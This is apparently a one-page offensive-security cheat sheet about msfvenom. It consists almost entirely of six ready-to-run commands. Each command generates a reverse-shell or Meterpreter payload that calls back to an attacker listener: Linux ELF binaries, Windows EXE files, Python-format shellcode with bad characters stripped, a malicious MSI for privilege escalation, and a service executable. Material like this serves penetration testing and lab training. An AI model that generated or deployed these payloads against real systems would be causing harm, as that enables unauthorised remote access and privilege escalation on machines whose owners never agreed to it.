Tools | February 9, 2026 | 1 min read | by 0xt0pus

msfvenom

Payload generator for creating shellcode, reverse shells, and encoded payloads


Msfvenom

Description

Msfvenom generates payloads and applies encoders to them. It can create reverse shells, bind shells, and other payloads in various formats (exe, elf, py, msi, etc.) for different platforms.

Usage 1: Linux Reverse Shell (x64 ELF)

Command:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.16.40.5 LPORT=4444 -f elf -o payload1.bin

Usage 2: Linux Meterpreter Reverse Shell (x86 ELF)

Command:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.40.5 LPORT=4444 -f elf -o payload.bin

Usage 3: Windows Meterpreter Reverse Shell (x64 EXE)

Command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.185.10.34 LPORT=1313 -f exe > shell.exe

Usage 4: Windows Reverse Shell with Bad Characters (Python format)

Command:

msfvenom -p windows/shell/reverse_tcp LHOST=10.185.10.34 LPORT=1313 -b "\x00\x0a\x0d" -f py

Usage 5: Windows MSI Package (for privilege escalation)

Command:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

Usage 6: Windows Service Executable

Command:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe